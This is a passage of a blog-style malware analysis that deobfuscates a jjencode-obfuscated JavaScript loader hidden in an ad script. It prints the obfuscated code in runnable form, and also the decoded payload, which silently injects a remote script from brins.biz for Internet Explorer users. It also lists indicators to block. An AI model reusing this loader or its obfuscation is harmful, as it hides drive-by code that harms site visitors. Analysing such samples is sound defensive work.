$$$+$a.__$+"."+$a.$$__+$a._$+"\\"+$a.__$+$a.$_$+$a.$_$+"'><" + "/\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}
Now we should be able to prettify this code a bit. Sometimes formatting can help to reveal the intent of certain code segments:
try {
$a = ~[];
$a = {
___: ++$a,
$$$$: (![] + "")[$a],
__$: ++$a,
$_$_: (![] + "")[$a],
_$_: ++$a,
$_$$: ({} + "")[$a],
$$_$: ($a[$a] + "")[$a],
_$$: ++$a,
$$$_: (!"" + "")[$a],
$__: ++$a,
$_$: ++$a,
$$__: ({} + "")[$a],
$$_: ++$a,
$$$: ++$a,
$___: ++$a,
$__$: ++$a
};
$a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
$a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
$a.$ = ($a.___)[$a.$_][$a.$_];
$a.$($a.$($a.$$ + "\"" + $a.$$_$ + "=" + $a.$$_$ + $a._$ + $a.$$__ + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";" + $a._ + $a.$_$_ + "=\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a.$$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$_$_ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "." + $a._ + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.___ + $a.__$ + "\\" + $a.__$ + $a.$__ + $a.$$$ + $a.$$$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.__ + ";\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$$ + "(" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "===" + $a._ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a.$$$_ + $a.$$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$$_ + $a.$$_$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('_" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=')==-" + $a.__$ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a._$_ + $a.$$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + $a.$$_$ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a.$$_ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + "\\" + $a.$__ + $a.___ + "&&\\" + $a.$__ + $a.___ + $a._ + $a.$_$_ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$$_ + $a.$_$_ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "\\" 
+ $a.__$ + $a.$_$ + $a.___ + "('\\" + $a.__$ + $a.__$ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a._$$ + "\\" + $a.__$ + $a.__$ + $a.__$ + "\\" + $a.__$ + $a.___ + $a.$_$ + "\\" + $a.$__ + $a.___ + "')>" + $a.___ + ")\\" + $a.$__ + $a.___ + "{" + $a.$$_$ + "._\\" + $a.__$ + $a.$$$ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "=" + $a.__$ + ";" + $a.$$_$ + "." + $a.$$__ + $a._$ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a._$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.$$$_ + "='__" + $a._ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a._ + $a.$$_$ + "=" + $a.__$ + ";\\" + $a.$__ + $a.___ + $a.$$$_ + "\\" + $a.__$ + $a.$$$ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "=\\" + $a.__$ + $a._$_ + $a.$$$ + $a.$$$_ + $a.$$_$ + ",\\" + $a.$__ + $a.___ + $a.___ + $a.__$ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.__$ + $a._$_ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.$__ + $a.___ + $a._$_ + $a.___ + $a._$_ + $a.___ + "\\" + $a.$__ + $a.___ + $a.___ + $a.___ + ":" + $a.___ + $a.___ + ":" + $a.___ + $a.___ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a._$_ + $a.$_$ + "\\" + $a.__$ + $a._$_ + $a.$__ + "\\" + $a.__$ + $a.___ + $a._$$ + ";\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.$_$_ + $a.__ + "\\" + $a.__$ + $a.$_$ + $a.___ + "=/';" + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a.$$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + $a.__ + $a.$$$_ + (![] + "")[$a._$_] + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "(\\\"<" + "\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\\"+\\\"\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + "\\" + $a.$__ + $a.___ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + $a.$$__ + "='\\" + $a.__$ + $a.$_$ + $a.___ + $a.__ + $a.__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "://" + $a.$_$$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + 
$a.__$ + "\\" + $a.__$ + $a.$_$ + $a.$$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "." + $a.$_$$ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\" + $a.__$ + $a.$$$ + $a._$_ + "/" + $a.___ + $a.$$__ + $a.$$__ + $a._$_ + $a._$_ + $a.$$$ + $a.$_$ + $a.$$_ + ".\\" + $a.__$ + $a.$_$ + $a._$_ + "\\" + $a.__$ + $a.$$_ + $a._$$ + "?" + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a.___ + "=" + $a.$_$_ + $a.$$_$ + ".\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$_$_ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + $a.$$$_ + "-\\" + $a.__$ + $a.$$_ + $a._$$ + $a.__ + $a._$ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$$$ + $a.__$ + "." + $a.$$__ + $a._$ + "\\" + $a.__$ + $a.$_$ + $a.$_$ + "'><" + "/\\" + $a.__$ + $a.$$_ + $a._$$ + $a.$$__ + "\\" + $a.__$ + $a.$$_ + $a._$_ + "\\" + $a.__$ + $a.$_$ + $a.__$ + "\\\"+\\\"\\" + $a.__$ + $a.$$_ + $a.___ + $a.__ + ">\\\");}" + "\"")())();
} catch (e) {}
Great! It's clear now that the code begins with an object declaration, and we can see why the whole code block is filled with dollar signs and underscores – all the properties of the object named "$a" are named with various combinations of those two characters. Tricky!
$a = ~[];
// ~[] : [] coerces to "" and then to 0, and ~0 is -1, so $a starts at -1.
$a = {
// Each ++$a yields the next integer 0..9. The string-indexed entries pull
// single letters out of the text of JavaScript values: (![]+"") is
// "false", (!""+"") is "true", ({}+"") is "[object Object]", and
// ($a[$a]+"") is "undefined" ($a is a plain number at that point, so
// indexing it with itself gives undefined).
___: ++$a, // 0
$$$$: (![] + "")[$a], // "false"[0] = "f"
__$: ++$a, // 1
$_$_: (![] + "")[$a], // "false"[1] = "a"
_$_: ++$a, // 2
$_$$: ({} + "")[$a], // "[object Object]"[2] = "b"
$$_$: ($a[$a] + "")[$a], // "undefined"[2] = "d"
_$$: ++$a, // 3
$$$_: (!"" + "")[$a], // "true"[3] = "e"
$__: ++$a, // 4
$_$: ++$a, // 5
$$__: ({} + "")[$a], // "[object Object]"[5] = "c"
$$_: ++$a, // 6
$$$: ++$a, // 7
$___: ++$a, // 8
$__$: ++$a // 9
};
Let's see if we can't make sense of this. The very first line uses a trick from the same family as the well-known JSFuck technique – in fact this exact layout (a single holder object whose property names are made only of $ and _, seeded with ~[]) is what the jjencode obfuscator produces, with $a as the chosen variable name. In JavaScript, "~[]" evaluates to -1 ([] becomes "" and then 0, and ~0 is -1), so that is our starting value for the variable "$a." The variable is then re-declared as an object, and if we calculate all the property values, it looks like this:
// The same object with every property evaluated: the ++$a entries are the
// integers 0-9 and the string-indexed entries are the letters a-f.
$a = -1;
$a = {
___: 0,
$$$$: "f",
__$: 1,
$_$_: "a",
_$_: 2,
$_$$: "b",
$$_$: "d",
_$$: 3,
$$$_: "e",
$__: 4,
$_$: 5,
$$__: "c",
$$_: 6,
$$$: 7,
$___: 8,
$__$: 9
};
Hmm...notice anything about that set of values? That's right, it maps cleanly to hexadecimal: the digits 0–9 and the letters a–f. That means this object can be used to spell out any hex digit, and – prefixed with a literal backslash – any other character as a numeric escape sequence. That is exactly what the recurring runs of "\\" + $a.__$ + $a.$_$ + $a.$_$ in the big line are: "\155", the octal escape for "m", which the inner string literal decodes when it is compiled. We're getting somewhere now! Let's have a look at the next few lines to see what we can make of them:
// Stage 2: spell "constructor" and "return", then fetch the Function constructor.
// Left-to-right evaluation is essential here. The parenthesised assignments stash
// single letters ($a._$ = "o", $a.$$ = "n", $a.__ = "t", $a.$ = "r", $a._ = "u")
// that later terms and the next two lines reuse. `$a + ""` is "[object Object]",
// and `$a.$ + ""` is "undefined" because $a.$ has not been assigned yet.
// Result: $a.$_ === "constructor".
$a.$_ = ($a.$_ = $a + "")[$a.$_$] + ($a._$ = $a.$_[$a.__$]) + ($a.$$ = ($a.$ + "")[$a.__$]) + ((!$a) + "")[$a._$$] + ($a.__ = $a.$_[$a.$$_]) + ($a.$ = (!"" + "")[$a.__$]) + ($a._ = (!"" + "")[$a._$_]) + $a.$_[$a.$_$] + $a.__ + $a._$ + $a.$;
// "r" + "true"[3] + "t" + "u" + "r" + "n" -> "return". Note this overwrites the
// "n" that $a.$$ received on the line above.
$a.$$ = $a.$ + (!"" + "")[$a._$$] + $a.__ + $a._ + $a.$ + $a.$$;
// (0)["constructor"] is Number and Number["constructor"] is the global Function
// constructor, so $a.$ becomes Function - an eval equivalent that compiles any
// string into a new function.
$a.$ = ($a.___)[$a.$_][$a.$_];
Through some simple variable substitution and manual formatting for readability, we can translate these three lines into something much more clear:
// The three setup lines with the numeric indices substituted and one term per
// line. Each term's value is given in the trailing comment; the parenthesised
// assignments are the single letters that later terms reuse.
$a.$_=
($a.$_=$a+"")[5]+ // "[object Object]"[5] -> "c" (the whole string is also kept in $a.$_ for the next terms)
($a._$=$a.$_[1])+ // "o"
($a.$$=($a.$+"")[1])+ // "undefined"[1] -> "n" ($a.$ is still unset at this point)
((!$a)+"")[3]+ // !object is false, "false"[3] -> "s"
($a.__=$a.$_[6])+ // "t"
($a.$=(!""+"")[1])+ // "true"[1] -> "r"
($a._=(!""+"")[2])+ // "true"[2] -> "u"
$a.$_[5]+ // "c"
$a.__+ // "t"
$a._$+ // "o"
$a.$; // "r"   => $a.$_ === "constructor"
$a.$$=
$a.$+ // "r"
(!""+"")[3]+ // "true"[3] -> "e"
$a.__+ // "t"
$a._+ // "u"
$a.$+ // "r"
$a.$$; // "n" (its value from the line above) => $a.$$ is now "return", replacing that "n"
$a.$=(0)["constructor"]["constructor"]; // (0).constructor is Number; Number.constructor is Function
Excellent! Now we see that "$a.$_" is just the string "constructor" and "$a.$$" is another string, "return". The third one, "$a.$", is not a string at all: `(0)["constructor"]` is `Number`, and `Number["constructor"]` is the global `Function` constructor, which compiles any string handed to it into a new function – the obfuscator's stand-in for `eval`. Printing it shows the native-code stub:
$a.$ = function Function() { [native code] }
Calling it compiles the string into a function; that function still has to be called for the payload to actually run, which is why the obfuscated block ends with a call on the result (`$a.$(…)()`). The code would be invoked like so:
$a.$("arbitrary javascript here");
Now there's just one big line of code left to deobfuscate. At this point we have enumerated all the relevant variables, so we'll substitute the corresponding value for each. Order of operations matters once again: if we substituted "$a.$$$" before "$a.$$$$", the longer name would be partially overwritten and would no longer substitute correctly, so longer names go first. One caveat: "$a.$$", "$a.$_" and "$a.$" are reassigned by the three setup lines (to "return", "constructor" and Function respectively); the table below lists the single-character values they held part-way through that first expression, which is why a stray "n" will show up at the start of the result in the next step. Here's the order we'll follow to make sure we don't screw up the code:
$a.$_$_: "a"
$a.$_$$: "b"
$a.$$__: "c"
$a.$$_$: "d"
$a.$$$_: "e"
$a.$$$$: "f"
$a.$__$: 9
$a.$___: 8
$a.$$$: 7
$a.$$_: 6
$a.$_$: 5
$a.$__: 4
$a._$$: 3
$a._$_: 2
$a.__$: 1
$a.___: 0
$a.$_: "c"
$a._$: "o"
$a.$$: "n"
$a.__: "t"
$a._: "u"
$a.$: function Function() { [native code] }
A simple round of find & replace with each variable from top to bottom results in the following code:
// Stage 3 after textual substitution. `function Function1/Function2` are the
// author's placeholders for the two nested $a.$( ... ) calls, i.e. roughly
// Function(Function("return \"...\"")())(); the inner body is one long string
// concatenation. Because the leftmost operand is a string, `+` never does
// arithmetic here: "\\" + 1 + 5 + 5 yields the four characters \155, an octal
// escape that only becomes a letter when the next Function() parses the text
// as a string literal. The leading "n" is the tail of "return": $a.$$ was
// substituted with the "n" it held briefly, not the "return" it ends up with.
try {
function Function1() {
function Function2() {
"n" + "\"" + "d" + "=" + "d" + "o" + "c" + "u" + "\\" + 1 + 5 + 5 + "e" + "\\" + 1 + 5 + 6 + "t" + ";" + "u" + "a" + "=\\" + 1 + 5 + 6 + "a" + "\\" + 1 + 6 + 6 + "\\" + 1 + 5 + 1 + "\\" + 1 + 4 + 7 + "a" + "t" + "o" + "\\" + 1 + 6 + 2 + "." + "u" + "\\" + 1 + 6 + 3 + "e" + "\\" + 1 + 6 + 2 + "\\" + 1 + 0 + 1 + "\\" + 1 + 4 + 7 + "e" + "\\" + 1 + 5 + 6 + "t" + ";\\" + 1 + 5 + 1 + "f" + "(" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "===" + "u" + "\\" + 1 + 5 + 6 + "d" + "e" + "f" + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "e" + "d" + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "d" + "." + "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('_" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=')==-" + 1 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 2 + 7 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "d" + "o" + "\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 3 + "\\" + 4 + 0 + "\\" + 1 + 1 + 6 + "\\" + 1 + 2 + 4 + "\\" + 4 + 0 + "')>" + 0 + "\\" + 4 + 0 + "&&\\" + 4 + 0 + "u" + "a" + ".\\" + 1 + 6 + 3 + "e" + "a" + "\\" + 1 + 6 + 2 + "c" + "\\" + 1 + 5 + 0 + "('\\" + 1 + 1 + 5 + "\\" + 1 + 2 + 3 + "\\" + 1 + 1 + 1 + "\\" + 1 + 0 + 5 + "\\" + 4 + 0 + "')>" + 0 + ")\\" + 4 + 0 + "{" + "d" + "._\\" + 1 + 7 + 2 + "\\" + 1 + 7 + 0 + "=" + 1 + ";" + "d" + "." 
+ "c" + "o" + "o" + "\\" + 1 + 5 + 3 + "\\" + 1 + 5 + 1 + "e" + "='__" + "u" + "t" + "\\" + 1 + 5 + 5 + "u" + "d" + "=" + 1 + ";\\" + 4 + 0 + "e" + "\\" + 1 + 7 + 0 + "\\" + 1 + 6 + 0 + "\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 2 + "e" + "\\" + 1 + 6 + 3 + "=\\" + 1 + 2 + 7 + "e" + "d" + ",\\" + 4 + 0 + 0 + 1 + "\\" + 4 + 0 + "\\" + 1 + 1 + 2 + "a" + "\\" + 1 + 5 + 6 + "\\" + 4 + 0 + 2 + 0 + 2 + 0 + "\\" + 4 + 0 + 0 + 0 + ":" + 0 + 0 + ":" + 0 + 0 + "\\" + 4 + 0 + "\\" + 1 + 2 + 5 + "\\" + 1 + 2 + 4 + "\\" + 1 + 0 + 3 + ";\\" + 4 + 0 + "\\" + 1 + 6 + 0 + "a" + "t" + "\\" + 1 + 5 + 0 + "=/';" + "d" + ".\\" + 1 + 6 + 7 + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "t" + "e" + (![] + "")[2] + "\\" + 1 + 5 + 6 + "(\\\"<" + "\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\\"+\\\"\\" + 1 + 5 + 1 + "\\" + 1 + 6 + 0 + "t" + "\\" + 4 + 0 + "\\" + 1 + 6 + 3 + "\\" + 1 + 6 + 2 + "c" + "='\\" + 1 + 5 + 0 + "t" + "t" + "\\" + 1 + 6 + 0 + "://" + "b" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\" + 1 + 5 + 6 + "\\" + 1 + 6 + 3 + "." + "b" + "\\" + 1 + 5 + 1 + "\\" + 1 + 7 + 2 + "/" + 0 + "c" + "c" + 2 + 2 + 7 + 5 + 6 + ".\\" + 1 + 5 + 2 + "\\" + 1 + 6 + 3 + "?" + "c" + "\\" + 1 + 6 + 0 + "=" + "a" + "d" + ".\\" + 1 + 6 + 3 + "a" + "\\" + 1 + 5 + 5 + "e" + "-\\" + 1 + 6 + 3 + "t" + "o" + "\\" + 1 + 6 + 2 + "\\" + 1 + 7 + 1 + "." + "c" + "o" + "\\" + 1 + 5 + 5 + "'><" + "/\\" + 1 + 6 + 3 + "c" + "\\" + 1 + 6 + 2 + "\\" + 1 + 5 + 1 + "\\\"+\\\"\\" + 1 + 6 + 0 + "t" + ">\\\");}" + "\""
}
}
} catch (e) {}
We're approaching readability now. Let's concatenate everything together and see how it looks. There's also one snippet of code in the middle we need to evaluate:
(![] + "")[2] -> evaluates to the letter "l"
Here's the resulting code block:
// Stage 3 with the concatenation folded into a single literal. Note the doubled
// backslashes (\\155, \\40): at this level they are still two characters, text that
// the next Function() pass will parse into octal escapes. The "<\\163c\\162" + "\\151\\160t"
// split is deliberate - it keeps the literal text "<script" out of the source so
// a naive grep for script injection finds nothing.
try {
function Function1() {
function Function2() {
"n\"d=docu\\155e\\156t;ua=\\156a\\166\\151\\147ato\\162.u\\163e\\162\\101\\147e\\156t;\\151f(d._\\172\\170===u\\156def\\151\\156ed\\40&&\\40d.coo\\153\\151e.\\163ea\\162c\\150('_ut\\155ud=')==-1\\40&&\\40ua.\\163ea\\162c\\150('\\127\\151\\156do\\167\\163\\40\\116\\124\\40')>0\\40&&\\40ua.\\163ea\\162c\\150('\\115\\123\\111\\105\\40')>0)\\40{d._\\172\\170=1;d.coo\\153\\151e='__ut\\155ud=1;\\40e\\170\\160\\151\\162e\\163=\\127ed,\\4001\\40\\112a\\156\\402020\\4000:00:00\\40\\125\\124\\103;\\40\\160at\\150=/';d.\\167\\162\\151tel\\156(\\\"<\\163c\\162\\\"+\\\"\\151\\160t\\40\\163\\162c='\\150tt\\160://b\\162\\151\\156\\163.b\\151\\172/0cc22756.\\152\\163?c\\160=ad.\\163a\\155e-\\163to\\162\\171.co\\155'></\\163c\\162\\151\\\"+\\\"\\160t>\\\");}\""
}
}
} catch (e) {}
So close now! Let's extract the code from inside the nested function blocks for another round of deobfuscation. We can see that some characters are escaped in there, so we'll do the same thing we did before and unescape backslashes, followed by quotes:
n"d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156(\"<\163c\162\"+\"\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\"+\"\160t>\");}"
The 'n' at the beginning of the string is not a template literal: it is the last letter of the word "return". "$a.$$" is first assigned "n" inside the big "constructor" expression, but the very next setup line overwrites it with "return", and the substitution table above used the earlier value. Put back, the inner function reads `return "d=docu\155e\156t;…"` – it returns the escaped string, and the outer `$a.$(…)()` call that closes the obfuscated block compiles and runs whatever that string contains. So the two stages do different jobs: the inner one turns the escape sequences into real characters when its string literal is parsed, and the outer one executes the result. If we drop the 'n', unescape quotes yet again, and concatenate the strings together, we get the following result:
d=docu\155e\156t;ua=\156a\166\151\147ato\162.u\163e\162\101\147e\156t;\151f(d._\172\170===u\156def\151\156ed\40&&\40d.coo\153\151e.\163ea\162c\150('_ut\155ud=')==-1\40&&\40ua.\163ea\162c\150('\127\151\156do\167\163\40\116\124\40')>0\40&&\40ua.\163ea\162c\150('\115\123\111\105\40')>0)\40{d._\172\170=1;d.coo\153\151e='__ut\155ud=1;\40e\170\160\151\162e\163=\127ed,\4001\40\112a\156\402020\4000:00:00\40\125\124\103;\40\160at\150=/';d.\167\162\151tel\156("<\163c\162\151\160t\40\163\162c='\150tt\160://b\162\151\156\163.b\151\172/0cc22756.\152\163?c\160=ad.\163a\155e-\163to\162\171.co\155'></\163c\162\151\160t>");}
Now we're starting to see recognizable commands – at the beginning, `document` is being assigned to a variable named "d". But what are all those numbers preceded by backslashes? Inside a JavaScript string literal, a backslash followed by one to three octal digits (0–7) is a legacy octal escape sequence naming a character by its code: `\155` is "m", `\156` is "n", `\40` is a space. These escapes are only resolved when the engine parses the literal, which is why the payload had to pass through `Function()` once before it could run, and why it could not have been a template literal (octal escapes are a syntax error there, and in strict-mode code generally). Let's decode them and see what we get:
d=document;ua=navigator.userAgent;if(d._zx===undefined && d.cookie.search('_utmud=')==-1 && ua.search('Windows NT ')>0 && ua.search('MSIE ')>0) {d._zx=1;d.cookie='__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");}
Bingo! We finally have our payload.
Step 4: Final Analysis
In order to determine what the payload does, let's prettify it:
// Decoded second-stage loader. Both variables are implicit globals (no var), so
// d and ua leak into window.
d = document;
ua = navigator.userAgent;
// Gate: run at most once, and only for the targeted browser.
//  - d._zx: per-document flag, so the loader fires once per page load
//  - cookie: skips clients already carrying the marker cookie set below;
//    search('_utmud=') is a substring match, so it also matches '__utmud='
//  - ua: only "Windows NT " + "MSIE " user agents are served; every other
//    browser (and any non-IE analysis sandbox) silently gets nothing
if (d._zx === undefined && d.cookie.search('_utmud=') == -1 && ua.search('Windows NT ') > 0 && ua.search('MSIE ') > 0) {
d._zx = 1;
// Site-wide marker cookie, expiring 1 Jan 2020. Its __utm* name resembles
// Google Analytics' cookie names - presumably chosen to blend in.
d.cookie = '__utmud=1; expires=Wed, 01 Jan 2020 00:00:00 UTC; path=/';
// Injects a remote script into the page at parse time via document.writeln,
// fetched over plaintext HTTP. The cp= parameter looks like a campaign/referrer
// tag carrying the site the ad was served on - confirm against the hosting page.
d.writeln("<script src='http://brins.biz/0cc22756.js?cp=ad.same-story.com'></script>");
}
Now it becomes quite easy to understand what this code is doing. First it checks some preconditions: a per-document flag and a marker cookie ensure the loader runs at most once, and the user-agent checks restrict it to Internet Explorer on Windows – every other browser silently gets nothing, which also means an analyst or sandbox using a different browser would never see the download. If those conditions are met, it sets the flag, drops the marker cookie (named in the style of Google Analytics' `__utm*` cookies, presumably to blend in) and uses `document.writeln` to inject a `<script>` tag that loads a second-stage script over plain HTTP from brins.biz, with what looks like the hosting site's name (`cp=ad.same-story.com`) in the query string. VirusTotal clearly shows this secondary script is malicious:
Sadly, the malicious domain was no longer resolvable at the time this article was written, so an analysis of the secondary payload was not possible (kill chain broken, hooray!). Without the capability to analyze that script, we just have to trust that the antivirus detections in VirusTotal are accurate. Two practical caveats for anyone who finds this in their own environment: a domain that fails to resolve today can be re-registered or re-pointed tomorrow, so `brins.biz` and the `0cc22756.js` path are still worth blocking and hunting for in proxy logs, and the `__utmud` cookie is a usable indicator on affected clients; and because of the IE-only gate, a detonation sandbox that is not Internet Explorer on Windows would never have triggered the download. From what we can see, a malicious JavaScript payload was intended to be injected into a page and executed by the victim's browser. The malicious code was embedded in another script that contained code for a (probably) legitimate ad framework.
Conclusion
In the end, the code given to me by a friend turned out to be adware with an unidentified malicious payload embedded. Whether the payload was delivered by the ad provider or injected by a third party cannot be determined without additional context, but the amount of work that went into obfuscating the payload clearly indicates that it was intended to remain hidden from casual inspection. All in all, I greatly enjoyed this exercise and learned a few new things along the way!